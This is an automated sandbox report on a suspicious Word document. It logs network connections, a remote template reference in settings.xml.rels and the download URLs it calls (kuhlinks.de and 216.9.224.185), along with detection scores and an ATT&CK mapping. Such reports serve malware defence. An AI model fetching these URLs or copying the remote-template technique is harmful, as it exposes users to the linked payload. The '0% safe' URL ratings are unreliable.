Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185
Source: unknown	TCP traffic detected without corresponding DNS query: 216.9.224.185

Source: global traffic	HTTP traffic detected: GET /3ri5DVX HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: kuhlinks.deConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /122/wend/swecaninsertforgoodforeeturncheclkgoodwecan___________wecaninsertforgoodforeeturncheclkgood________wecaninsertforgoodforeeturncheclkgood.doc HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateConnection: Keep-AliveHost: 216.9.224.185

Source: global traffic

DNS traffic detected: DNS query: kuhlinks.de

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49689
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49685
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49684
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49683
Source: unknown	Network traffic detected: HTTP traffic on port 49694 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49694
Source: unknown	Network traffic detected: HTTP traffic on port 49685 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49683 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49689 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49684 -> 443

Source: unknown	HTTPS traffic detected: 104.21.47.51:443 -> 192.168.2.7:49683 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.47.51:443 -> 192.168.2.7:49684 version: TLS 1.2

Source: classification engine

Classification label: mal60.evad.winDOC@2/4@1/2

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File created: C:\Users\user\Desktop\~$P 7527518303 2507294.docx.doc

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File created: C:\Users\user~1\AppData\Local\Temp\{94868287-871F-43BA-97D8-3F8092CFF33F} - OProcSessId.dat

Jump to behavior

Source: IMP 7527518303 2507294.docx.doc	OLE indicator, Word Document stream: true
Source: ~WRD0000.tmp.0.dr	OLE indicator, Word Document stream: true

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: IMP 7527518303 2507294.docx.doc	Virustotal: Detection: 13%
Source: IMP 7527518303 2507294.docx.doc	ReversingLabs: Detection: 16%

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process created: unknown unknown			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: IMP 7527518303 2507294.docx.doc	Initial sample: OLE zip file path = word/_rels/footer2.xml.rels
Source: IMP 7527518303 2507294.docx.doc	Initial sample: OLE zip file path = word/_rels/settings.xml.rels
Source: ~WRD0000.tmp.0.dr	Initial sample: OLE zip file path = word/_rels/footer2.xml.rels
Source: ~WRD0000.tmp.0.dr	Initial sample: OLE zip file path = word/_rels/settings.xml.rels

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll

Jump to behavior

Source: IMP 7527518303 2507294.docx.doc

Initial sample: OLE indicators vbamacros = False

Persistence and Installation Behavior

Contains an external reference to another file

Source: settings.xml.rels

Extracted files from sample: https://goodsubmitbestthings.doc@kuhlinks.de/3ri5dvx

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Process information queried: ProcessInformation

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Windows Management Instrumentation	Path Interception	1 Process Injection	1 Masquerading	OS Credential Dumping	1 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	3 Exploitation for Client Execution	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Virtualization/Sandbox Evasion	LSASS Memory	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Process Injection	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	1 File and Directory Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	2 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
IMP 7527518303 2507294.docx.doc	14%	Virustotal		Browse
IMP 7527518303 2507294.docx.doc	17%	ReversingLabs

Source	Detection	Scanner	Label	Link
https://kuhlinks.de/3ri5DVX	0%	Avira URL Cloud	safe
http://216.9.224.185/122/wend/swecaninsertforgoodforeeturncheclkgoodwecan___________wecaninsertforgoodforeeturncheclkgood________wecaninsertforgoodforeeturncheclkgood.doc	0%	Avira URL Cloud	safe

Domains and IPs

Download Network PCAP: filtered – full

Contacted Domains

